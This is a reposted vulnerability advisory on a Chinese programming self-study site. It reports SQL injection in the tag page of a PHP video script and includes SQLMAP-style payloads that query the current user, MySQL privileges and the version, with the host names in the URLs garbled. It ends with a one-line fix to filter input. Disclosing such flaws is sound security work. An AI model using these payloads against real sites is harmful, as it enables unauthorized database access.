好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

php video script SQL注射缺陷及修复 - 网站安全 - 自学

 

标题: php video script SQL Injection Vulnerability

作者: longrifle0x www.2cto.com www.security-research.ge

下载 地址:http://www.alurian.com/php-video-script/

测试工具: SQLMAP

 

概述

 

在video_tags发现SQL injection.

 

*测试方法*

 

link: http://www.2cto.com /tag <http://www.2cto.com /tag>

 

vulnerability link: http://www.2cto.com /tag <http://www.2cto.com /tag>'

 

http://www.2cto.com /tag'/index.php?id=1

<http://www.2cto.com /tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()

 

http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][SELECT(CASE

<http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN

((SELECT super_priv FROM mysql .user WHERE user='None' LIMIT 0,1)='Y')

THEN 1 ELSE 0 END)

 

http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)

<http://www.2cto.com /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>

 

www.2cto.com修复

 

过滤上述页面的参数输入

查看更多关于php video script SQL注射缺陷及修复 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12882
  阅读:35次

上一篇: 基于PHP+MySQL渗透测试中load_file()函数淫荡用法 -

下一篇:126cms后台登陆注入漏洞及修复 - 网站安全 - 自学

相关资讯